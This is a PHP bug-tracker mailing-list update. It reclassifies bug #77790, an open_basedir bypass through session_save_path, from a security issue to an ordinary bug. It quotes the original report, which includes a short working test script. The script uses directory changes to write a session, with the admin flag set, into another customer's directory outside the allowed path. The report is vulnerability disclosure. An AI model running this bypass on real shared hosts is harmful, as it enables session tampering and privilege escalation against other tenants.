Sec Bug->Bug #77790 [Opn]: open_basedir bypass in session_save_path

From: Date: Mon, 12 Jul 2021 15:38:01 +0000
Subject: Sec Bug->Bug #77790 [Opn]: open_basedir bypass in session_save_path
References: 1  Groups: php.bugs 
Request: Send a blank email to php-bugs+get-234979@lists.php.net to get a copy of this message
Edit report at https://bugs.php.net/bug.php?id=77790&edit=1 ID: 77790 Updated by: cmb@php.net Reported by: adamiwaniuk at gmail dot com Summary: open_basedir bypass in session_save_path Status: Open -Type: Security +Type: Bug Package: Session related Operating System: Linux PHP Version: 7.2.16 Block user comment: N Private report: Y New Comment: open_basedir bypasses are not considered to be security issues; cf. <https://externals.io/message/105606> and <https://externals.io/message/115406>. Previous Comments: ------------------------------------------------------------------------ [2019-03-24 21:55:32] adamiwaniuk at gmail dot com Description: ------------ initial script directory: /var/www/html open_basedir setting: /var/www/html initial session save path: default after executing test script, session is saved in the /other-customer-session-dir location Test script: --------------- <?php echo session_save_path()."<br>"; mkdir("a"); mkdir("a/b"); mkdir("a/b/c"); chdir("a/b/c"); session_save_path("../../../other-customer-session-dir"); chdir("../../.."); echo session_save_path()."<br>"; session_start(); $_SESSION['admin']=1; Expected result: ---------------- session is not saved in /other-customer-session-dir because this is outside open_basedir and inital location (when removed chdir from this code session_save_path("../../../other-customer-session-dir"); fails) Actual result: -------------- session is saved in /other-customer-session-dir ------------------------------------------------------------------------ -- Edit this bug report at https://bugs.php.net/bug.php?id=77790&edit=1

« previous php.bugs (#234979) next »